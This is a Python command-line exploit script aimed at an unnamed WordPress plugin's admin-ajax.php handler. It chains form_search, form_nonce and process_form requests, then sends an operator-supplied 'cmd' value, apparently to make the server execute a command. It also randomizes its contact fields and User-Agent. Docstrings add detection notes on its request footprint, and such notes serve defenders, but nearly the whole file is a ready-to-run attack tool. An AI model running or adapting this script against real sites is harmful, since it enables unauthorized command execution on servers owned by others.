"""Interactive proof-of-concept client against a WordPress admin-ajax.php handler.

What the visible code does, in order: POST ``action=form_search`` to
``/wp-admin/admin-ajax.php`` and list the returned forms, ask the operator to
pick a form id, POST ``action=form_nonce`` for that id, then POST
``action=process_form`` with fabricated contact fields and a ``cmd`` field
taken from the command line.

Detection note: the observable footprint is that three-step sequence of POSTs
to admin-ajax.php from one client (``form_search`` -> ``form_nonce`` ->
``process_form``), with a ``cmd`` parameter present on the last request.
The ``cmd`` default ``/tmp/test`` is a file path, so the receiving handler is
presumably expected to execute it -- the plugin/handler itself is not named
anywhere in this file.
"""

import requests
from faker import Faker
from urllib.parse import urlparse
import time
import sys
import click

# Silences only the InsecureRequestWarning. None of the requests.post calls below
# pass verify=False, so certificate verification is still performed; this line
# has no effect on that.
requests.packages.urllib3.disable_warnings(
    requests.packages.urllib3.exceptions.InsecureRequestWarning
)

# ASCII-art banner printed by display_banner(). Reproduced as given; the source
# was whitespace-mangled, so the original line breaks inside it are not recoverable.
banner = r""" .=+*+++- =#***#**##.:-. -#**#####*#*.: :#*#%@#+#@%#.- =##*%##***#%=**#*=-. ***#*%#%#####*****+*= -#%*############*=***+*+- :%%#***#####*****#@#*#*#***+=: .=#####**#*******#%%%####*******+-. :*##%###*#*#%%##***%%%%%%%#**********#*+- :*#******##%#####%%%%##***#%%%##***********: =###****#***#***##*##********#%%%%#*********** :#********#**#*+*##*###**###+**###%%%%###****#**. +#*********%***===++#+*##*=+=====+*##==*##%%%%#- .=*#####***#%%%#**++===+++#*+++++++=++*## ::: :-*********##*=%%%#=++++++*++++++=====++++%%: :=*#*********##- :%%%#+======================#%#. =*##*********#*. .#%%%*+======================+#%* .-+*##********#%#. .*%%#*+========+++++++=========##%*: :*******#***##%#= :*%%%%**+=======================+***%%#=:::::-===========--: .#***#*###**##%%%+=+#%%%%%%##*====================+*###%%%%%%#########***********=. -*+=++=+*==+*+*%#****###%%%%%%%%#***##*****#####*#%%%%%%%#%************************* .*#==+==+==+##+=******###*#####%%%%%%%%%%%%%%%%%%%####*******###********************#= :*#+=*==*==**#++#*********##*******######%%####*************##*****#***************##* .##*#==*+=*=+#*##**************************#*==+++++*+*****************************#%%* .#%%##**+*#*#*#******************************#+=====++++**#****************#***####%%%#. :*%%%%%#*#***********************************#+=++===+***+****#####***#####**##%%%%%#=. -%%%%%####***********************************++++==++*+*######*############%#%###*= .::-*+*+#%%#*##******+*##*#####*---...::=*+++##***+*++=---:=+:++-%*==+--:.: . . ..--:-==--: .:+##+-. 
"""


class ExploitScript:
    """Holds the target URL and the ``cmd`` value, and walks the three-request flow.

    State: ``form_id`` starts as None and is filled in by fetch_form_id() from
    operator input; fetch_nonce() and prepare_payload() read it afterwards.
    """

    def __init__(self, url: str, cmd: str):
        # url: full target URL; only scheme and host are used (see get_base_url).
        # cmd: value sent verbatim in the "cmd" field of the final request.
        self.url = url
        self.cmd = cmd
        # Set later by fetch_form_id(); None until the operator picks a form.
        self.form_id = None

    @staticmethod
    def display_banner() -> None:
        """Print the module-level ASCII banner."""
        print(banner)

    @staticmethod
    def spinner(duration: float = 10, interval: float = 0.1) -> None:
        """Show a rotating cursor for roughly ``duration`` seconds.

        Purely cosmetic: cycles through four characters every ``interval``
        seconds until the deadline passes, then prints a newline. The loop
        only checks the deadline once per full cycle, so it can overrun by up
        to 4 * interval.
        """
        spinner_chars = ["|", "/", "-", "\\"]
        end_time = time.time() + duration
        while time.time() < end_time:
            for char in spinner_chars:
                sys.stdout.write(f"\r[{char}] Exploit loading, please wait...")
                sys.stdout.flush()
                time.sleep(interval)
        print("")

    def get_base_url(self) -> str:
        """Return ``scheme://netloc`` of ``self.url``, dropping path, query and fragment."""
        parsed_url = urlparse(self.url)
        return f"{parsed_url.scheme}://{parsed_url.netloc}"

    def fetch_form_id(self) -> None:
        """List forms via ``action=form_search`` and store the operator's choice in ``self.form_id``.

        Expects the JSON body to be a list of objects with "id" and "name"
        keys; any other shape raises KeyError/TypeError here, uncaught.
        On a non-200 status the process exits with code 1.
        """
        base_url = self.get_base_url()
        req_url = f"{base_url}/wp-admin/admin-ajax.php"
        data = {"action": "form_search"}
        # No timeout is passed, so a silent server blocks this call indefinitely.
        response = requests.post(req_url, data=data)
        if response.status_code == 200:
            form_data = response.json()
            ids = [item["id"] for item in form_data]
            names = [item["name"] for item in form_data]
            print("[+] Available Forms:")
            # NOTE: the loop variable shadows the builtin ``id`` within this loop.
            for id, name in zip(ids, names):
                print(f" {id}: {name}")
            # Interactive: the chosen id is taken from stdin, not validated
            # against ``ids``.
            self.form_id = input("[+] Select Form ID >>> ").strip()
        else:
            print(f"[-] Failed to fetch forms: {response.status_code}")
            # ``exit`` here is the site-module builtin, not sys.exit.
            exit(1)

    def fetch_nonce(self) -> str:
        """Request ``action=form_nonce`` for the selected form and return the nonce string.

        Side effect: calls fetch_form_id() first, which prompts on stdin and
        sets ``self.form_id``. The nonce is read from the "data" key of the
        JSON response (empty string if absent). Non-200 exits with code 1.
        """
        base_url = self.get_base_url()
        req_url = f"{base_url}/wp-admin/admin-ajax.php"
        self.fetch_form_id()
        data = {"action": "form_nonce", "form_id": self.form_id}
        response = requests.post(req_url, data=data)
        if response.status_code == 200:
            nonce = response.json().get("data", "")
            print(f"[+] Nonce Retrieved: {nonce}")
            return nonce
        else:
            print(f"[-] Failed to fetch nonce: {response.status_code}")
            exit(1)

    def prepare_payload(self) -> dict:
        """Build the form body for the final ``action=process_form`` request.

        Calls fetch_nonce() (and through it fetch_form_id()). The contact
        fields are random Faker values; ``cmd`` is passed through unchanged
        from the constructor.
        """
        nonce = self.fetch_nonce()
        fake = Faker()
        payload = {
            "form_id": self.form_id,
            "nonce": nonce,
            "first_name": fake.first_name(),
            "last_name": fake.last_name(),
            "email": fake.email(),
            "action": "process_form",
            "cmd": self.cmd,
        }
        return payload

    def send_request(self) -> None:
        """POST the prepared payload to admin-ajax.php and print the outcome.

        A fresh random User-Agent is generated per call, so the UA string is
        not a stable indicator; the request sequence and the ``cmd`` field are.
        Success is judged only by ``response.ok`` (HTTP status < 400); the
        response body is not inspected.
        """
        base_url = self.get_base_url()
        req_url = f"{base_url}/wp-admin/admin-ajax.php"
        payload = self.prepare_payload()
        headers = {"User-Agent": Faker().user_agent()}
        response = requests.post(req_url, data=payload, headers=headers)
        if response.ok:
            print("[+] Exploit delivered successfully.")
        else:
            print(f"[-] Exploit failed: {response.status_code}")


@click.command()
@click.option("--url", required=True, help="Target URL")
@click.option("--cmd", default="/tmp/test", help="Command to execute")
def main(url: str, cmd: str) -> None:
    """CLI entry point: banner, a one-second spinner, then the full request flow."""
    exploit = ExploitScript(url, cmd)
    exploit.display_banner()
    # duration=1 overrides the 10-second default of spinner().
    exploit.spinner(duration=1)
    exploit.send_request()


if __name__ == "__main__":
    main()